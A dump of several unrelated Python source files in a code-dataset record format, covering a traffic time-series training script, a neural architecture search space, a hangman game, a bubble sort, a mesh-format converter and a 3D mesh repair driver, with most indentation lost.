data_args = get_dataset(file_name=args.file_name, col_name_tar=args.col_name_tar,
flag_multi=args.flag_multi, flag_fuse=args.flag_fuse,
tag_norm=args.tag_norm, train_ratio=args.train_ratio,
trn_batch_size=args.trn_batch_size, vld_batch_size=args.vld_batch_size,
shuffle=args.shuffle)
print('Iter: ', i + 1)
engine = get_model(data_args, name_model=args.name_model, lstm_hid_size=args.lstm_hid_size, lr=args.lr)
engine.train(i_run=i, n_epochs=args.n_epochs, flag_info=True)
res_final = engine.test()
all_res.append(res_final.tolist())
if 'TSA_uni' not in engine.name_model:
save_net(args.save, engine.model, engine.name_model + '-{}'.format(i + 1) + '.pkl')
            # save the plot image locally
plt.savefig(os.path.join(args.save, engine.name_model + '-{}'.format(i + 1) + '_plot.eps'),
format='eps', bbox_inches='tight')
save_path = os.path.join(args.save, args.name_model)
del data_args['train_loader']
del data_args['test_loader']
del data_args['df']
data_args['test_err'] = all_res
data_args['file_name'] = args.file_name
with open(save_path, 'w') as handle:
json.dump(data_args, handle)
print(all_res)
return
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--file_name', type=str, default='../dataset/_TS/traffic.csv', help='location of data')
parser.add_argument('--col_name_tar', type=str, default='Slowness_in_traffic', help='target feature name')
parser.add_argument('--flag_multi', action='store_true', default=False, help='whether use multiple input features')
parser.add_argument('--flag_fuse', action='store_true', default=False, help='whether fuse input features')
parser.add_argument('--shuffle', action='store_true', default=False, help='whether fuse input features')
parser.add_argument('--tag_norm', type=str, default='min-max', help='Normalization type: none/min-max/Z-score')
parser.add_argument('--train_ratio', type=float, default=2/3, help='The ratio of train samples')
parser.add_argument('--lr', type=float, default=0.001, help='learning rate')
parser.add_argument('--name_model', type=str, default='lstm', help='model name - lstm/cnn/TSA_uni_naive/TSA_uni_avg/TSA_uni_mov_win')
parser.add_argument('--save', type=str, default='pred', help='location of dir to save')
parser.add_argument('--str_time', type=str, default=None, help='time string')
parser.add_argument('--iterations', type=int, default=10, help='number of search iterations')
parser.add_argument('--n_workers', type=int, default=4, help='number of workers for dataloader per evaluation job')
parser.add_argument('--trn_batch_size', type=int, default=12, help='train batch size for training')
parser.add_argument('--vld_batch_size', type=int, default=12, help='test batch size for inference')
parser.add_argument('--n_epochs', type=int, default=200, help='number of epochs for CNN training')
parser.add_argument('--lstm_hid_size', type=int, default=3, help='hidden size of lstm')
cfgs = parser.parse_args()
cfgs.str_time = time.strftime("%Y%m%d-%H%M%S")
cfgs.save = '{}-{}-{}'.format(cfgs.save, cfgs.name_model, cfgs.str_time)
print(cfgs)
main(cfgs)
``` |
{
"source": "Johnzhjw/MOE-DGNAS",
"score": 2
} |
#### File: Johnzhjw/MOE-DGNAS/search_space.py
```python
import torch
import random
import numpy as np
class MacroSearchSpace(object):
def __init__(self, search_space=None, dim_type=None, search_space2=None, dim_type2=None, tag_all=False):
if search_space and dim_type:
self.search_space = search_space
self.dim_type = dim_type
self.search_space2 = search_space2
self.dim_type2 = dim_type2
else:
# Define operators in search space
self.search_space = {
'layer_flag': [False, True],
'attention_type': ["linear", "gen_linear", "cos", "const", "gcn", "gat", "sym-gat"], # "ggcn",
'aggregator_type': ["mean", "sum", "pool_mean", "pool_max", "mlp"], # "gru", "lstm", "none",
'combinator_type': ["mlp", "identity", "none"], # "gru", "lstm", "none", "lstm",
'activate_function': ["linear", "elu", "sigmoid", "tanh",
"relu", "relu6", "softplus", "leaky_relu"],
'number_of_heads': [1, 2, 4, 6, 8, 16], #
'hidden_units': [4, 8, 16, 32, 64, 128],
# 'attention_dim': [4, 8, 16, 32, 64, 128, 256], #
# 'pooling_dim': [4, 8, 16, 32, 64, 128, 256],
# 'feature_dropout_rate': [0.05, 0.6], # [0.05, 0.1, 0.2, 0.3, 0.4, 0.5], #
# 'attention_dropout_rate': [0.05, 0.6], # [0.05, 0.1, 0.2, 0.3, 0.4, 0.5], #
# 'negative_slope': [0.01, 0.49], # [0.05, 0.1, 0.2, 0.3, 0.4, 0.5], #
# 'residual': [False, True],
# 'dropout_rate': [0.2, 0.4, 0.6, 0.8],
'se_layer': [False, True],
}
self.dim_type = [
"bool",
"discrete",
"discrete",
"discrete",
"discrete",
"discrete",
"discrete",
# "discrete",
# "discrete",
# "float",
# "float",
# "float",
# "bool"
# "discrete",
"bool"
]
self.search_space2 = {
# 'weight_decay_rate': [5e-4, 8e-4, 1e-3, 4e-3], # [5e-4, 8e-4, 1e-3, 4e-3], #
# 'learning_rate': [5e-4, 1e-3, 5e-3, 1e-2], # [5e-4, 1e-2], #
'short_cut': [False, True], # [5e-4, 1e-2], #
}
self.dim_type2 = [
# "discrete",
# "discrete",
"bool",
]
if len(self.search_space) != len(self.dim_type):
raise RuntimeError("Wrong Input: unmatchable input lengths")
if len(self.search_space2) != len(self.dim_type2):
raise RuntimeError("Wrong Input2: unmatchable input lengths")
self.action_names = list(self.search_space.keys())
self.action_lens = []
for key in self.action_names:
self.action_lens.append(len(self.search_space[key]))
self.state_num = len(self.search_space)
self.action_names2 = list(self.search_space2.keys())
self.action_lens2 = []
for key in self.action_names2:
self.action_lens2.append(len(self.search_space2[key]))
self.state_num2 = len(self.search_space2)
self.tag_all = tag_all
def get_search_space(self):
return self.search_space
def get_search_space2(self):
return self.search_space2
# Assign operator category for controller RNN outputs.
# The controller RNN will select operators from search space according to operator category.
def generate_action_list(self, num_of_layers=2):
action_list = []
for _ in range(num_of_layers):
for act in self.action_names:
action_list.append(act)
if self.tag_all:
for act in self.action_names2:
action_list.append(act)
return action_list
def generate_solution(self, num_of_layers=2):
lb = self.get_lb(num_of_layers)
ub = self.get_ub(num_of_layers)
solution = []
for vl, vu in zip(lb, ub):
solution.append(random.uniform(vl, vu))
return solution
def generate_action_solution(self, num_of_layers=2):
action_list = self.action_names * num_of_layers
actions = []
for i, key in enumerate(action_list):
k = i % self.state_num
if self.dim_type[k] == "float":
actions.append(random.uniform(self.search_space[key][0], self.search_space[key][1]))
else:
ind = (int)(self.action_lens[k] * torch.rand(1))
actions.append(self.search_space[key][ind])
if self.tag_all:
for k, key in enumerate(self.action_names2):
if self.dim_type2[k] == "float":
actions.append(random.uniform(self.search_space2[key][0], self.search_space2[key][1]))
else:
ind = (int)(self.action_lens2[k] * torch.rand(1))
actions.append(self.search_space2[key][ind])
return actions
def generate_action_solution_4_surrogate(self, num_of_layers=2):
action_list = self.action_names * num_of_layers
actions = []
for i, key in enumerate(action_list):
k = i % self.state_num
if self.dim_type[k] == "float":
actions.append(random.uniform(self.search_space[key][0], self.search_space[key][1]))
else:
ind = (int)(self.action_lens[k] * torch.rand(1))
actions.append(ind)
if self.tag_all:
for k, key in enumerate(self.action_names2):
if self.dim_type2[k] == "float":
actions.append(random.uniform(self.search_space2[key][0], self.search_space2[key][1]))
else:
ind = (int)(self.action_lens2[k] * torch.rand(1))
actions.append(ind)
return np.array(actions).reshape(1, -1)
def generate_action_base(self, num_of_layers=2):
action_list = self.action_names * num_of_layers
actions = []
for i, key in enumerate(action_list):
k = i % self.state_num
if self.dim_type[k] == "float":
actions.append(random.uniform(self.search_space[key][0], self.search_space[key][1]))
elif self.dim_type[k] == "bool":
actions.append(True)
else:
if key in ['number_of_heads', 'hidden_units', 'attention_dim', 'pooling_dim']:
ind = (int)(self.action_lens[k] - 1)
else:
ind = (int)(self.action_lens[k] * torch.rand(1))
actions.append(self.search_space[key][ind])
if self.tag_all:
for k, key in enumerate(self.action_names2):
if self.dim_type2[k] == "float":
actions.append(random.uniform(self.search_space2[key][0], self.search_space2[key][1]))
else:
ind = (int)(self.action_lens2[k] * torch.rand(1))
actions.append(self.search_space2[key][ind])
return actions
def generate_actions_4_solution(self, solution):
state_length = len(solution)
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise RuntimeError("Wrong Input: unmatchable input")
actions = []
for i in range(state_length):
val = solution[i]
k = i % self.state_num
key = self.action_names[k]
if self.dim_type[k] == "float":
actions.append(val)
else:
ind = (int)(val)
actions.append(self.search_space[key][ind])
if self.tag_all:
num_layers = state_length // self.state_num
for k, key in enumerate(self.action_names2):
i = num_layers * self.state_num + k
val = solution[i]
if self.dim_type2[k] == "float":
actions.append(val)
else:
ind = (int)(val)
actions.append(self.search_space2[key][ind])
return actions
def generate_surrogate_actions_4_solution(self, solution):
state_length = len(solution)
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise RuntimeError("Wrong Input: unmatchable input")
actions = []
for i in range(state_length):
val = solution[i]
k = i % self.state_num
key = self.action_names[k]
if self.dim_type[k] == "float":
actions.append(val)
else:
ind = (int)(val)
actions.append(ind)
if self.tag_all:
num_layers = state_length // self.state_num
for k, key in enumerate(self.action_names2):
i = num_layers * self.state_num + k
val = solution[i]
if self.dim_type2[k] == "float":
actions.append(val)
else:
ind = (int)(val)
actions.append(ind)
return np.array(actions).reshape(1, -1)
def get_lb(self, num_of_layers=2):
action_list = self.action_names * num_of_layers
lb = []
for i, key in enumerate(action_list):
k = i % self.state_num
if self.dim_type[k] == "float":
lb.append(self.search_space[key][0])
else:
lb.append(0)
if self.tag_all:
for k, key in enumerate(self.action_names2):
if self.dim_type2[k] == "float":
lb.append(self.search_space2[key][0])
else:
lb.append(0)
return lb
def get_ub(self, num_of_layers=2):
action_list = self.action_names * num_of_layers
ub = []
for i, key in enumerate(action_list):
k = i % self.state_num
if self.dim_type[k] == "float":
ub.append(self.search_space[key][1])
else:
ub.append(self.action_lens[k] - 1e-6)
if self.tag_all:
for k, key in enumerate(self.action_names2):
if self.dim_type2[k] == "float":
ub.append(self.search_space2[key][1])
else:
ub.append(self.action_lens2[k] - 1e-6)
return ub
def get_last_layer_ind(self, actions):
state_length = len(actions)
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise Exception("wrong action length")
maxN_layers = state_length // self.state_num
ind_last_layer = 0
for _ in range(maxN_layers):
tmp_offset = _ * self.state_num
if _ == 0 or actions[tmp_offset] == True:
ind_last_layer = _
return ind_last_layer
def remove_invalid_layer(self, actions):
state_length = len(actions)
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise Exception("wrong action length")
maxN_layers = state_length // self.state_num
action_list = []
for _ in range(maxN_layers):
tmp_offset = _ * self.state_num
if _ == 0 or actions[tmp_offset] == True:
for i in range(self.state_num):
if i > 0:
action_list.append(actions[tmp_offset + i])
return action_list
def get_dim_num(self, num_of_layers=2):
nDim = num_of_layers * self.state_num
if self.tag_all:
nDim += self.state_num2
return nDim
def get_varTypes(self, num_of_layers=2):
varTypes_list = []
for _ in range(num_of_layers):
for ty in self.dim_type:
varTypes_list.append(ty)
if self.tag_all:
for ty in self.dim_type2:
varTypes_list.append(ty)
return varTypes_list
def get_layer_num(self, vals):
state_length = len(vals)
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise RuntimeError("Wrong Input: unmatchable input")
num_layer = state_length // self.state_num
return num_layer
def statistics_solution(self, solutions):
state_length = len(solutions[0])
if self.tag_all:
state_length -= self.state_num2
if state_length % self.state_num != 0:
raise RuntimeError("Wrong Input: unmatchable input")
        # use fresh result dicts; aliasing self.search_space here would let the
        # initialisation below wipe the search-space definition itself
        statistics1 = {}
        statistics2 = {}
for key in self.action_names:
statistics1[key] = []
for key in self.action_names2:
statistics2[key] = []
for solution in solutions:
for i in range(state_length):
val = solution[i]
k = i % self.state_num
key = self.action_names[k]
if self.dim_type[k] == "float":
statistics1[key].append(val)
else:
ind = (int)(val)
statistics1[key].append(self.search_space[key][ind])
if self.tag_all:
num_layers = state_length // self.state_num
for k, key in enumerate(self.action_names2):
i = num_layers * self.state_num + k
val = solution[i]
if self.dim_type2[k] == "float":
statistics2[key].append(val)
else:
ind = (int)(val)
statistics2[key].append(self.search_space2[key][ind])
return statistics1, statistics2
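# Hedged usage sketch (illustrative only): the class encodes one slot per
# operator category per layer, plus the global options in search_space2 when
# tag_all=True, so a two-layer architecture can be sampled and bounded with
#   space = MacroSearchSpace(tag_all=True)
#   actions = space.generate_action_solution(num_of_layers=2)
#   lb, ub = space.get_lb(2), space.get_ub(2)   # box bounds for an EA encoding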
``` |
{
"source": "JohnZhong2021/Python-practice-project",
"score": 4
} |
#### File: Python-practice-project/code/04Hangman.py
```python
word_list = ["english", "python", "apple"]
user_input_number = int(input("Please choose a word to guess by entering a number from 1 to 3: "))
word_index = user_input_number - 1
user_guess_letter_total = []
guess_count = 0
while guess_count < 10:
word_guess = list(word_list[word_index])
user_guess_letter = input("Please enter your guessed letter: ")
user_guess_letter_total.append(user_guess_letter)
guess_count += 1
def check_word(word_guess, user_guess_letter_total):
for i in range(len(word_guess)):
if word_guess[i] not in user_guess_letter_total:
word_guess[i] = "*"
return word_guess
print("The guessed word is",''.join(check_word(word_guess, user_guess_letter_total)))
if "*" not in word_guess:
print("\nCongretulations! You win!!!")
break
if guess_count >=10:
print("Sorry, you only have 10 times to guess, better luck next time...")
```
#### File: Python-practice-project/code/10Bubble_sort_algorithm.py
```python
import random
def generate_random_list(n):
L = []
i = 1
while i<=n:
L.append(random.randint(1,n))
i += 1
return L
def bubble_sort(L):
n = len(L)
if n == 1 or n==0:
return L
else:
while n >= 2:
j = 0
while j < n-1:
if L[j] > L[j+1]:
E = L[j+1]
L[j+1] = L[j]
L[j] = E
else:
pass
j += 1
n -= 1
return L
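# Quick illustrative check: bubble_sort([3, 1, 2]) returns [1, 2, 3]; the nested
# loops above perform about n*(n-1)/2 comparisons in the worst case.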
print(bubble_sort(generate_random_list(100)))
``` |
{
"source": "johnzjq/ShrinkRepair",
"score": 3
} |
#### File: obj2poly/obj2poly/obj2polyfolder.py
```python
import os, sys, subprocess
def Main():
obj2poly = "c:\\python27\\python "
path = os.path.dirname(os.path.realpath(__file__))
obj2poly = obj2poly + path + "\\obj2poly.py"
os.chdir(sys.argv[1])
if sys.argv[2] == "obj2poly":
dFiles = []
for f in os.listdir('.'):
if f[-3:] == 'obj':
dFiles.append(f)
if len(dFiles) == 0:
return
for f in dFiles:
fout = f[:-4] + '.poly'
runstr = obj2poly + ' ' + f + ' ' + fout
#print runstr
op = subprocess.call(runstr)
if op.poll():
print op.communicate()
op.terminate()
op.communicate()
elif sys.argv[2] == "poly2obj":
dFiles = []
for f in os.listdir('.'):
if f[-4:] == 'poly':
dFiles.append(f)
if len(dFiles) == 0:
return
for f in dFiles:
fout = f[:-5] + '.obj'
runstr = obj2poly + ' ' + f + ' ' + fout
#print runstr
op = subprocess.call(runstr)
elif sys.argv[2] == "poly2poly":
dFiles = []
for f in os.listdir('.'):
if f[-4:] == 'poly':
dFiles.append(f)
if len(dFiles) == 0:
return
for f in dFiles:
fout = f[:-5] + '.poly'
runstr = obj2poly + ' ' + f + ' ' + fout + ' True'
#print runstr
op = subprocess.call(runstr)
if __name__ == '__main__':
Main()
```
#### File: RepairShrink/RepairShrink/RepairShrink.py
```python
import os, sys, types
import ModelData, ModelDataFuncs, DecomposeFunc, TetraFunc, CarveFunc
#sys.path.append("..\\..\\obj2poly\obj2poly/")
sys.path.append("D:\\JohnGitHub\\mySVN\\obj2poly\\obj2poly\\")
from ConvProvider import ConvProvider
MIDFILEPATH = "tmpRepairShrink.obj"
#start the repair procedure
#isSemantic is equal to True means the semantics should be handled
#debugControl is used to debug
def do_the_work(inputFilePath, isSemantic, debugControl):
#Init mid files
if os.path.exists(MIDFILEPATH):
os.remove(MIDFILEPATH)
#Init datastructure
ModelDataFuncs.Init()
ModelData.strInputFileName, ext = os.path.splitext(inputFilePath)
#read file
print ("----Processing file----")
print (inputFilePath)
if isSemantic == True:
if os.path.splitext(inputFilePath)[1] == '.obj':
print('WARNING: obj format does not contain semantics')
print('Semantics will be deduced')
print ("Check and tessellate the file...")
#MyCov = ConvProvider()
#MyCov.convert(inputFilePath, MIDFILEPATH, True)
##read a tesselated objfile
#if ModelDataFuncs.reader_obj(MIDFILEPATH) == False:
# raise Exception
if ModelDataFuncs.reader_obj(inputFilePath) == False:
raise Exception
else:
#poly with semantics
try:
if not ModelDataFuncs.reader_poly_with_semantics(inputFilePath):
return
except:
raise ImportError
else:
#preprocess (convert and tessellation)
print ("Check and tessellate the file...")
MyCov = ConvProvider()
MyCov.convert(inputFilePath, MIDFILEPATH, True)
#read a tesselated objfile
if ModelDataFuncs.reader_obj(MIDFILEPATH) == False:
raise Exception
#invert the normal of the input model
if ModelData.global_INVERT_NORMAL:
ModelDataFuncs.invert_poly_normal()
#only for debug
#tmp = ModelData.centerVertex
#ModelData.centerVertex = (0.0, 0.0, 0.0)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CLS.obj")
#ModelData.centerVertex = tmp
#
if int(debugControl) == 1:
print("Mode 1 start...\n")
#Decomposit all the triangles%
DecomposeFunc.model_decompositionEx()
#Merge all the coplaner dictFaces
#coplaner_face_merge()
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_DEC.obj")
elif int(debugControl) == 2:
print("Mode 2 start...\n")
#Constrained Tetrahedralization
if False == TetraFunc.CDT():
print("Constrained Delauney Tetrahedralization FAILED!")
return
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CDT.obj")
#Heuristic carving
CarveFunc.heuristic_tet_carving()
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CARVE.obj")
#Reconstruct the mesh from tetrahedron
TetraFunc.extract_mesh_from_tet(isSemantic)
#Output
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT.obj")
if isSemantic:
ModelDataFuncs.writer_poly_with_semantics(ModelData.strInputFileName + "_OUTPUT.poly")
elif int(debugControl) == 3:
print("Mode 3 start...\n")
#only deduce the semantics
TetraFunc.deduce_semantics_of_poly(isSemantic)
ModelDataFuncs.writer_poly_with_semantics(ModelData.strInputFileName + "_OUTPUT.poly")
elif int(debugControl) == 4:
print("Mode 4 comparison mode start...\n")
#Constrained Tetrahedralization
if False == TetraFunc.CDT():
print("Constrained Delauney Tetrahedralization FAILED!")
return
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CDT.obj")
#####copy datacopy
ModelDataFuncs.preserveModelData()
#switches = [('dof',0), ('deg', 0), ('volume',0), ('flatness',0),('depth',0), ('distanceToCenter',1), ('directions',0), ('area' ,0), ('level' ,0), ('curvature',0)]
print CarveFunc.globalHeuristic
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_none.obj")
#different combinations
#dof
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['dof'] = 1
print CarveFunc.globalHeuristic
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof.obj")
#dof+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
print CarveFunc.globalHeuristic
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_deg.obj")
CarveFunc.globalHeuristic['deg'] = 0
#dof+volume
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['volume'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_vol.obj")
#dof+volume+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_vol_deg.obj")
CarveFunc.globalHeuristic['volume'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+flatness
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['flatness'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_flat.obj")
#dof+flatness+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_flat_deg.obj")
CarveFunc.globalHeuristic['flatness'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+depth
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['depth'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_depth.obj")
#dof+depth+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_depth_deg.obj")
CarveFunc.globalHeuristic['depth'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+distant
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['distanceToCenter'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist.obj")
#dof+distant+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_dist_deg.obj")
CarveFunc.globalHeuristic['distanceToCenter'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+direction
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['direction'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_direction.obj")
#dof+direction+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_direction_deg.obj")
CarveFunc.globalHeuristic['direction'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+area
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['area'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_area.obj")
#dof+area+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_area_deg.obj")
CarveFunc.globalHeuristic['area'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+level
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['level'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level.obj")
#dof+level+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_level_deg.obj")
CarveFunc.globalHeuristic['level'] = 0
CarveFunc.globalHeuristic['deg'] = 0
#dof+curvature
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['curvature'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_curve.obj")
#dof+curvature+deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof_curve_deg.obj")
CarveFunc.globalHeuristic['curvature'] = 0
CarveFunc.globalHeuristic['deg'] = 0
CarveFunc.globalHeuristic['dof'] = 0
#deg
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['deg'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_deg.obj")
CarveFunc.globalHeuristic['deg'] = 0
#volume
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['volume'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_vol.obj")
CarveFunc.globalHeuristic['volume'] = 0
#flatness
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['flatness'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_flat.obj")
CarveFunc.globalHeuristic['flatness'] = 0
#depth
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['depth'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_depth.obj")
CarveFunc.globalHeuristic['depth'] = 0
#distant
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['distanceToCenter'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist.obj")
CarveFunc.globalHeuristic['distanceToCenter'] = 0
#direction
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['direction'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_direction.obj")
CarveFunc.globalHeuristic['direction'] = 0
#area
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['area'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_area.obj")
CarveFunc.globalHeuristic['area'] = 0
#level
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['level'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_level.obj")
CarveFunc.globalHeuristic['level'] = 0
#curvature
ModelDataFuncs. restoreModelData()
CarveFunc.globalHeuristic['curvature'] = 1
CarveFunc.heuristic_tet_carving()
TetraFunc.extract_mesh_from_tet(isSemantic)
ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_curve.obj")
CarveFunc.globalHeuristic['curvature'] = 0
elif int(debugControl) == 5:
print("Mode 5 new comparison mode start...\n")
#Constrained Tetrahedralization
if False == TetraFunc.CDT():
print("Constrained Delauney Tetrahedralization FAILED!")
return
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_CDT.obj")
#####copy datacopy
ModelDataFuncs.preserveModelData()
CarveFunc.globalOutputGlobalSTA = True
#switches = [('dof',0), ('deg', 0), ('volume',0), ('flatness',0),('depth',0), ('distanceToCenter',1), ('directions',0), ('area' ,0), ('level' ,0), ('curvature',0)]
#already generated in mode 4 thus commented
#None
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_none.obj")
##dof
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['dof']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dof.obj")
# #deg
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['deg']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_deg.obj")
##volume
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['vol']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_vol.obj")
##flatness
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['flatness']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_flat.obj")
##depth
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['depth']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_depth.obj")
##distant
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['distanceToCenter']
#CarveFunc.heuristic_tet_carving()
#TetraFunc.extract_mesh_from_tet(isSemantic)
#ModelDataFuncs.writer_obj(ModelData.strInputFileName+"_OUTPUT_dist.obj")
# #direction
#ModelDataFuncs. restoreModelData()
#CarveFunc.indicators = ['direction']
#CarveFunc.heuristic_tet_carving()
